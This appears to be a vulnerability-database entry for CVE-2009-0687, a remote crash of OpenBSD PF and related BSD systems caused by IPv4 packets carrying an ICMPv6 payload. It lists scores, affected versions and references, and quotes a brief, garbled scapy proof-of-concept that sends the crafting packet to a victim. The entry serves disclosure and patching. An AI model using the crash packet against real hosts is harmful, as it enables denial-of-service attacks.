Published: 11/08/2009 Updated: 29/09/2017

CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10

VMScore: 795

Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

The pf_test_rule function in OpenBSD Packet Filter (PF), as used in OpenBSD 4.2 up to and including 4.5, NetBSD 5.0 before RC3, MirOS 10 and previous versions, and MidnightBSD 0.3-current allows remote malicious users to cause a denial of service (panic) via crafted IP packets that trigger a NULL pointer dereference during translation, related to an IPv4 packet with an ICMPv6 payload.

Vulnerable Product	Search on Vulmon	Subscribe to Product
netbsd netbsd 5.0
midnightbsd midnightbsd 0.3-current
mirbsd miros
openbsd openbsd 4.2
openbsd openbsd 4.3
openbsd openbsd 4.4
openbsd openbsd 4.5

_ _ _____ _ ___ _____ _ _ / / / / ____/ / / _/_ __/ / / / / /_/ / __/ / / / / / / / /_/ / / __ / /___/ /____/ / / / / __ / /_/ /_/_____/_____/___/ /_/ /_/ /_/ Helith - 0815 ---------------------------------------- ...

import sys from scapy import * victim=sysargv[1] icmpv6=58 p=IP(dst=victim) pproto=icmpv6 sr(p,timeout=1) # milw0rmcom [2009-04-14] ...

CWE-399 http://www.vupen.com/english/advisories/2009/1015 http://www.openbsd.org/errata45.html#002_pf http://www.helith.net/txt/multiple_vendor-PF_null_pointer_dereference.txt http://www.securityfocus.com/archive/1/502634 http://www.osvdb.org/53608 http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2009-001.txt.asc http://www.openbsd.org/errata44.html#013_pf ftp://ftp.openbsd.org/pub/OpenBSD/patches/4.3/common/013_pf.patch http://www.openbsd.org/errata43.html#013_pf https://exchange.xforce.ibmcloud.com/vulnerabilities/49837 https://www.exploit-db.com/exploits/8581 https://www.exploit-db.com/exploits/8406 https://nvd.nist.gov https://www.exploit-db.com/exploits/8406/

CVE-2009-0687

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect